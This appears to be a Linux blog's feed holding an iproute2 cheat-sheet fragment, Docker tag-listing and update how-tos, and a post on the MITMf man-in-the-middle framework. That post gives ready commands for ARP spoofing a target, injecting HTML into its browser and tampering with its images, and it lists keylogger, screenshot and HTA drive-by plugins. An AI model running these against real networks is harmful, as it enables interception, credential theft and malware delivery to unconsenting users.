addr add 192.168.1.1/24 dev em1 </code></pre> <h4 id="deleteanaddress">Delete an address</h4> <p>Remove address 192.168.1.1/24 from device em1 </p> <pre><code>ip addr del 192.168.1.1/24 dev em1 </code></pre> <h4 id="alterthestatusoftheinterface">Alter the status of the interface</h4> <p>Bring em1 online </p> <pre><code>ip link set em1 up </code></pre> <p>Bring em1 of offline </p> <pre><code>ip link set em1 down </code></pre> <p>Set the MTU on em1 to 9000 </p> <pre><code>ip link set em1 mtu 9000 </code></pre> <p>Enable promiscuous mode for em1 </p> <pre><code>ip link set em1 promisc on </code></pre> <h1 id="adjustingandviewingroutes">ADJUSTING AND VIEWING ROUTES</h1> <h4 id="addanentrytotheroutingtable">Add an entry to the routing table</h4> <p>Add a default route (for all addresses) via the local gateway 192.168.1.1 that can be reached on device em1</p> <pre><code>ip route add default via 192.168.1.1 dev em1 </code></pre> <p>Add a route to 192.168.1.0/24 via the gateway at 192.168.1.1 </p> <pre><code>ip route add 192.168.1.0/24 via 192.168.1.1 </code></pre> <p>Add a route to 192.168.1.0/24 that can be reached on device em1 </p> <pre><code>ip route add 192.168.1.0/24 dev em1 </code></pre> <h4 id="deletearoutingtableentry">Delete a routing table entry</h4> <p>Delete the route for 192.168.1.0/24 via the gateway at 192.168.1.1 </p> <pre><code>ip route delete 192.168.1.0/24 via 192.168.1.1 </code></pre> <h4 id="replaceoraddifnotdefinedaroute">Replace, or add if not defined, a route</h4> <p>Replace the defined route for 192.168.1.0/24 to use device em1 </p> <pre><code>ip route replace 192.168.1.0/24 dev em1 </code></pre> <h4 id="displaytherouteanaddresswilltake">Display the route an address will take</h4> <p>Display the route taken for IP 192.168.1.5 </p> <pre><code>ip route get 192.168.1.5 </code></pre> <h1 id="managingthearptable">MANAGING THE ARP TABLE</h1> <h4 id="addanentrytothearptable">Add an entry to the ARP Table</h4> <p>Add address 192.168.1.1 with MAC 1:2:3:4:5:6 to em1 </p> <pre><code>ip neigh add 192.168.1.1 lladdr 1:2:3:4:5:6 dev em1 </code></pre> <h4 id="invalidateanentry">Invalidate an entry</h4> <p>Invalidate the entry for 192.168.1.1 on em1 </p> <pre><code>ip neigh del 192.168.1.1 dev em1 </code></pre> <h4 id="replaceoraddsifnotdefinedanentrytothearptable">Replace, or adds if not defined, an entry to the ARP table</h4> <p>Replace the entry for address 192.168.1.1 to use MAC 1:2:3:4:5:6 on em1 </p> <pre><code>ip neigh replace 192.168.1.1 lladdr 1:2:3:4:5:6 dev em1 </code></pre> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>Man-In-The-Middle Attack Framework: MITMf<p><code>MITMf</code> is a Framework for Man-In-The-Middle attacks. <code>MITMf</code> aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.</p> <p>Originally built to address the significant shortcomings of other tools (e.g <code>Ettercap</code>, <code>Mallory</code>), it's been almost completely re-written from scratch to provide a</p>http://www.googlinux.com/man-in-the-middle-attack-framework-mitmf/a759e34a-01f8-469d-af71-91da07596952Cyber SecurityHarsh KhandelwalThu, 25 Aug 2016 12:06:41 GMT<img src="http://www.googlinux.com/content/images/2016/08/pic.jpg" alt="Man-In-The-Middle Attack Framework: MITMf"><p><code>MITMf</code> is a Framework for Man-In-The-Middle attacks. <code>MITMf</code> aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.</p> <p>Originally built to address the significant shortcomings of other tools (e.g <code>Ettercap</code>, <code>Mallory</code>), it's been almost completely re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.</p> <p><code>MITMf</code> is available with <a href="http://www.kali.org">Kali Linux</a>. It can also be installed on any flavour of linux. To install MITMf kindly follow the process available at <a href="https://github.com/byt3bl33d3r/MITMf/wiki/Installation">https://github.com/byt3bl33d3r/MITMf/wiki/Installation</a> </p> <p><code>MITMf</code> is a simple to use command line attack tool. This article presents some example which can be a real fun ;). Use it at your own risk.</p> <h3 id="injecthtmlpageinvictimsbrowser">Inject html page in victims browser</h3> <p>Create a index.html in your root folder and ...</p> <pre><code>root@debian:~# cd /usr/share/mitmf/ root@debian:/usr/share/mitmf# python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.9 --inject --html-file /root/index.html </code></pre> <p>The above example will injects this index.html in the victims(192.168.1.9 in this example) browser whenever he is viewing some http(not https) website. </p> <ul> <li><code>-i</code> is for the interface (wlan0 in this example)</li> <li><code>--spoof</code> Loads plugin 'Spoof'</li> <li><code>--arp</code> Redirect traffic using ARP spoofing</li> <li><code>--gateway GATEWAY</code>Specify the gateway IP on your network.</li> <li><code>--targets TARGETS</code> Specify host/s to poison [if ommited will default to subnet]</li> <li><code>--inject</code> Load plugin 'Inject' to inject index.html</li> </ul> <blockquote> <p><strong>Note:</strong> <mark>arp spoof attack</mark> intercepts the traffic between the gateway (or router) and the target (192.168.1.9). All traffic thats going from victim to gateway now goes through the attackers system.</p> </blockquote> <h3 id="makeimageslookupsidedown">Make images look upside-down</h3> <p>This is real fun. Whatever http websites the victim is viewing, all images appearing on the pages will be flipped to 180 degrees.</p> <pre><code>root@debian:/usr/share/mitmf# python mitmf.py -i eth0 --spoof --arp --gateway 192.168.8.1 --target 192.168.8.100 --upsidedownternet </code></pre> <h3 id="replaceimagesimagerandomiser">Replace images (Image Randomiser)</h3> <p>Image randomiser MITMf plugin replaces images in the victims browsers with a random one from a specified directory (<code>/root/Pictures/</code> in this example).</p> <pre><code>root@debian:/usr/share/mitmf# python mitmf.py -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.9 --imgrand --img-dir /root/Pictures/ </code></pre> <h3 id="otherplugins">Other Plugins</h3> <p>There are many other plugins available with <code>MITMf</code> you can play with.</p> <ul> <li>To take a screenshot of victims browser</li> </ul> <pre><code>ScreenShotter: Uses HTML5 Canvas to render an accurate screenshot of a clients browser --screen Load plugin 'ScreenShotter' --interval SECONDS Interval at which screenshots will be taken (default 10 seconds) </code></pre> <ul> <li>Injects a javascript keylogger into victims webpages</li> </ul> <pre><code>--jskeylogger Load plugin 'JSKeylogger' </code></pre> <ul> <li>Performs HTA drive-by attacks on victim</li> </ul> <pre><code>--hta Load plugin 'HTA Drive-By' --text TEXT Text to display on notification bar --hta-app HTA_APP Path to HTA application [defaults to config/hta_driveby/flash_setup.hta] </code></pre> <p><strong><em>Have fun, be safe :)</em></strong></p> <blockquote> <h1 id="disclaimer">Disclaimer</h1> <p><em>Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and <a href="http://googlinux.com">http://googlinux.com</a> will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.</em></p> <p><em>This site contains materials that can be potentially damaging or dangerous. If you do not fully understand something on this site, then GO OUT OF HERE! Refer to the laws in your province/country before accessing, using,or in any other way utilizing these materials.These materials are for educational and research purposes only.Do not attempt to violate the law with anything contained here. If this is your intention, then LEAVE NOW! Neither administration of this server, the authors of this material, or anyone else affiliated in any way, is going to accept responsibility for your actions. Neither the creator nor GoogLinux is responsible for the comments posted on this website.</em></p> </blockquote> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>How to list all tags of a docker image<h3 id="dockersearch">Docker Search</h3> <p>To search a image on docker remote registry you can use docker search command.</p> <p><mark>Example:</mark></p> <pre><code>root@googlinux.com:~# docker search ubuntu NAME DESCRIPTION STARS OFFICIAL AUTOMATED ubuntu Ubuntu is a Debian-based Linux operating s... 4482 [OK] ubuntu-upstart Upstart is an event-based replacement for ... 65 [OK] rastasheep/ubuntu-sshd Dockerized</code></pre>http://www.googlinux.com/list-all-tags-of-docker-image/5495aef8-29e9-4e0e-8de6-86488bb72053DockerSwapnil JainFri, 19 Aug 2016 02:28:00 GMT<h3 id="dockersearch">Docker Search</h3> <img src="http://www.googlinux.com/content/images/2016/08/dockerbanner.jpg" alt="How to list all tags of a docker image"><p>To search a image on docker remote registry you can use docker search command.</p> <p><mark>Example:</mark></p> <pre><code>root@googlinux.com:~# docker search ubuntu NAME DESCRIPTION STARS OFFICIAL AUTOMATED ubuntu Ubuntu is a Debian-based Linux operating s... 4482 [OK] ubuntu-upstart Upstart is an event-based replacement for ... 65 [OK] rastasheep/ubuntu-sshd Dockerized SSH service, built on top of of... 32 [OK] torusware/speedus-ubuntu Always updated official Ubuntu docker imag... 27 [OK] </code></pre> <p>This example displays images with a name containing <code>ubuntu</code>. First column displays the name of image. You may notice <code>rastasheep/ubuntu-sshd</code> has a <code>/</code> in the name. The left portion i.e. <code>rastasheep</code> is the username and right portion i.e. <code>ubuntu-sshd</code> is the image name. Some image does not have a <code>/</code> in the name, just like the first one i.e. <code>ubuntu</code>. In this case <code>library</code> is the username</p> <blockquote> <p><strong>Note:</strong> Search queries will only return up to 25 results. You can use --limit option to change the search result display limit.</p> </blockquote> <h3 id="dockerpull">Docker pull</h3> <p><code>docker pull</code> is the command to pull docker image from remote registry. </p> <pre><code>root@googlinux.com:~# docker pull debian Using default tag: latest latest: Pulling from library/debian </code></pre> <p>This will try to pull the image with <mark>latest</mark> tag. </p> <h3 id="listfirst10tags">List first 10 tags</h3> <p>Listing all the available tag can be tricky. Well that information is always available on the image info page on hub.docker.com. There are lot of cases that you may need this information using a command line. This can be done using a simple API call and parsing the <code>json</code> output using <code>jq</code> tool.</p> <pre><code>root@googlinux.com:~# curl 'https://registry.hub.docker.com/v2/repositories/library/debian/tags/'|jq '."results"[]["name"]' "7.11" "testing" "oldstable-backports" "oldstable" "8" "8.5" "stretch" "experimental" "rc-buggy" "wheezy-backports" </code></pre> <blockquote> <p><strong>Note:</strong> <code>jq</code> is a tool for processing JSON inputs. <code>jq</code> is like <code>sed</code> for JSON data - you can use it to slice and filter and map and transform structured data with the same ease that <code>sed</code>, <code>awk</code>, <code>grep</code> and friends let you play with text.</p> </blockquote> <h3 id="ascripttolistalltags">A script to List all Tags</h3> <pre><code>i=0 while [ $? == 0 ] do i=$((i+1)) curl https://registry.hub.docker.com/v2/repositories/library/debian/tags/?page=$i 2&gt;/dev/null|jq '."results"[]["name"]' done </code></pre> <p>and now debian image with a specific tag can be pulled using</p> <pre><code>root@googlinux.com:~# docker pull debian:testing </code></pre> <p>Or if you want to pull all tag of a image</p> <pre><code>root@googlinux.com:~# docker pull -a debian </code></pre> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>How to update all docker images<p>Docker does not have a command to update images that you have already pulled. The only way is to pull all images again using <code>docker pull &lt;image&gt;</code> command. This simple one-liner can help you update all images at once.</p> <pre><code>docker images |grep -v REPOSITORY|awk '{print $1}</code></pre>http://www.googlinux.com/update-all-docker-images/1347f1dd-7caf-445a-a233-36074cbd53c7DockerSwapnil JainThu, 18 Aug 2016 05:26:01 GMT<img src="http://www.googlinux.com/content/images/2016/08/dockerbanner-2.jpg" alt="How to update all docker images"><p>Docker does not have a command to update images that you have already pulled. The only way is to pull all images again using <code>docker pull &lt;image&gt;</code> command. This simple one-liner can help you update all images at once.</p> <pre><code>docker images |grep -v REPOSITORY|awk '{print $1}'|xargs -L1 docker pull </code></pre> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>